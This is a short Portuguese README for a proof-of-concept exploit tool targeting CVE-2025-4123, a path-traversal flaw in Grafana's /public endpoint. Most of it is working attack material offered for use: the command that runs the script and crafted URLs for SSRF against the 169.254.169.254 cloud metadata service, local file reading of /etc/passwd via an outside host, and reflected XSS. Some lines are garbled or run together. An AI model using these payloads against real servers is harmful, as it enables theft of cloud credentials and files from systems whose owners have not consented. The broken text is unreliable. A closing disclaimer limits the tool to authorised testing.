
CVE-2025-4123 - Ferramenta Grafana
Desenvolvido por mitsec
Esta é uma ferramenta de exploração de prova de conceito (PoC) para o CVE-2025-4123, uma vulnerabilidade crítica de path traversal no endpoint /public do Grafana. A exploração permite:
Instâncias do Grafana com o endpoint /public/ que tratam incorretamente caminhos codificados como:
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
python3 cve_2025_4123_exploit_mitsec_final.py
Em seguida, selecione o modo desejado:
169.254.169.254/etc/passwd[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL: http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL: http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
Este código é fornecido apenas para fins educacionais e de teste autorizado. O uso não autorizado contra sistemas sem consentimento é ilegal.